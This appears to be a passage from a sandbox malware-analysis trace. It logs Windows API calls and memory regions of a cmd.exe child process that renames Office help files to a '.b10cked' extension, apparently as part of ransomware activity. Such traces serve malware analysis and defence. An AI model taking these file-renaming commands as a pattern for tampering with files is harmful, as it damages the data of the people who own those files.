GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsto~1.hxn")) returned 0x2022 [0202.154] SetErrorMode 
(uMode=0x0) returned 0x0 [0202.154] SetErrorMode (uMode=0x1) returned 0x0 [0202.154] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", nBufferLength=0x104, lpBuffer=0x2cf330, lpFilePart=0x2cf0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", lpFilePart=0x2cf0c8*="MSMSTO~1.HXN") returned 0x27 [0202.154] SetErrorMode (uMode=0x0) returned 0x1 [0202.154] SetErrorMode (uMode=0x0) returned 0x0 [0202.154] SetErrorMode (uMode=0x1) returned 0x0 [0202.154] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x2cf538, lpFilePart=0x2cf0c8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked", lpFilePart=0x2cf0c8*="MS.MSTORE.14.1033.hxn.b10cked") returned 0x38 [0202.154] SetErrorMode (uMode=0x0) returned 0x1 [0202.154] SetLastError (dwErrCode=0x0) [0202.154] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.mstore.14.1033.hxn.b10cked")) returned 0xffffffff [0202.154] GetLastError () returned 0x2 [0202.154] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2cea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea44) returned 0x3b0e70 [0202.154] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x2cea44 | out: lpFindFileData=0x2cea44) returned 0 [0202.155] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.155] GetLastError () returned 0x12 [0202.155] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x2cea44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cea44) returned 0x3b0e70 [0202.155] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x2cea44 | out: lpFindFileData=0x2cea44) returned 0 [0202.155] FindClose (in: 
hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.155] GetLastError () returned 0x12 [0202.156] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be0) returned 0x3b0e70 [0202.156] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x3c1be0 | out: lpFindFileData=0x3c1be0) returned 0 [0202.156] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.156] GetLastError () returned 0x12 [0202.156] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x3c1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3c1be0) returned 0x3b0e70 [0202.156] FindNextFileW (in: hFindFile=0x3b0e70, lpFindFileData=0x3c1be0 | out: lpFindFileData=0x3c1be0) returned 0 [0202.156] FindClose (in: hFindFile=0x3b0e70 | out: hFindFile=0x3b0e70) returned 1 [0202.156] GetLastError () returned 0x12 [0202.156] _get_osfhandle (_FileHandle=2) returned 0xb [0202.156] GetFileType (hFile=0xb) returned 0x2 [0202.575] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.575] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2cec14 | out: lpMode=0x2cec14) returned 1 [0202.575] _get_osfhandle (_FileHandle=2) returned 0xb [0202.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2cec48 | out: lpConsoleScreenBufferInfo=0x2cec48) returned 1 [0202.575] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.577] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2cec88 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c 
[0202.577] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x2cec6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2cec6c*=0x2c) returned 1 [0202.577] longjmp () [0202.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.577] SetConsoleInputExeNameW () returned 0x1 [0202.577] GetConsoleOutputCP () returned 0x1b5 [0202.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.578] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.578] exit (_Code=1) Process: id = "470" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x6fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29286 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" 
filename = "" Region: id = 29287 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29288 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29289 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29290 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29291 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29292 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29293 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29294 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29295 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30150 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30151 start_va = 0x150000 end_va = 0x1b6fff entry_point = 
0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30152 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30153 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 30154 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30155 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30156 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30157 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30158 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30159 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30160 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" 
(normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30161 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30162 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30163 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30164 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30165 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30166 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 30167 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 30168 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 30169 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 30170 start_va = 0x410000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 30171 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 30172 start_va = 0x1120000 
end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 30269 start_va = 0x1290000 end_va = 0x134ffff entry_point = 0x1290000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 667 os_tid = 0xdcc [0204.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc1c | out: lpSystemTimeAsFileTime=0x12fc1c*(dwLowDateTime=0xae8b7220, dwHighDateTime=0x1d440a9)) [0204.238] GetCurrentProcessId () returned 0x6fc [0204.238] GetCurrentThreadId () returned 0xdcc [0204.238] GetTickCount () returned 0x39923 [0204.238] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc14 | out: lpPerformanceCount=0x12fc14*=26102754547) returned 1 [0204.239] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.239] __set_app_type (_Type=0x1) [0204.239] __p__fmode () returned 0x76b331f4 [0204.239] __p__commode () returned 0x76b331fc [0204.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.239] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.240] GetCurrentThreadId () returned 0xdcc [0204.240] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdcc) returned 0x38 [0204.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.240] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.240] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.240] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, 
phkResult=0x12fbac | out: phkResult=0x12fbac*=0x0) returned 0x2 [0204.240] VirtualQuery (in: lpAddress=0x12fbe3, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.240] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb7c, dwLength=0x1c | out: lpBuffer=0x12fb7c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.240] GetConsoleOutputCP () returned 0x1b5 [0204.241] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.241] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.242] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0204.242] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.242] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.242] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.242] GetEnvironmentStringsW () returned 0x320178* [0204.242] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0204.243] GetEnvironmentStringsW () returned 0x320178* [0204.243] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0204.243] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb1c | out: phkResult=0x12eb1c*=0x40) returned 0x0 [0204.246] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0xa0, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x0, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, 
lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegCloseKey (hKey=0x40) returned 0x0 [0204.250] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb1c | out: phkResult=0x12eb1c*=0x40) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x0, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: 
lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.251] RegCloseKey (hKey=0x40) returned 0x0 [0204.251] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.251] srand (_Seed=0x5b8863a6) [0204.251] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" [0204.251] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" [0204.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.251] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.252] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.252] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.252] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.252] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.252] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", 
_String2="CMDCMDLINE") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.252] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.252] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.252] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.252] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.252] GetEnvironmentStringsW () returned 0x3222c8* [0204.261] FreeEnvironmentStringsW (penv=0x3222c8) returned 1 [0204.261] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.261] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.261] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.261] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.261] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.261] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.261] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.261] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f8e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f8e8, lpFilePart=0x12f8e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f8e4*="Desktop") returned 0x18 [0204.261] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.261] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 
[0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 [0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 [0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.262] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.262] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.263] GetEnvironmentStringsW () returned 0x322ae8* [0204.263] FreeEnvironmentStringsW (penv=0x322ae8) returned 1 [0204.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.263] GetConsoleOutputCP () returned 0x1b5 [0204.263] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.263] GetUserDefaultLCID () returned 0x409 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa28, cchData=128 | out: lpLCData="0") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa28, cchData=128 | out: lpLCData="0") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa28, cchData=128 | out: lpLCData="1") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 